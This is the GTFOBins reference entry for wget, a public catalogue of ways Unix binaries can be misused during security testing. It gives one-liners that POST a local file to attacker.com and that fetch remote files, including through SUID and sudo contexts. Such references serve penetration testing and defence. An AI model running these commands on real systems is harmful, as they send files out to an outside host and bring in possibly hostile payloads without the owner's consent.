GTFOBins.github.io/_gtfobins/wget.md
2020-06-10 22:53:45 +02:00

28 lines
1017 B
Markdown

---
functions:
file-upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data.
code: |
export URL=http://attacker.com/
export LFILE=file_to_send
wget --post-file=$LFILE $URL
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
wget $URL -O $LFILE
suid:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
./wget $URL -O $LFILE
sudo:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
sudo wget $URL -O $LFILE
---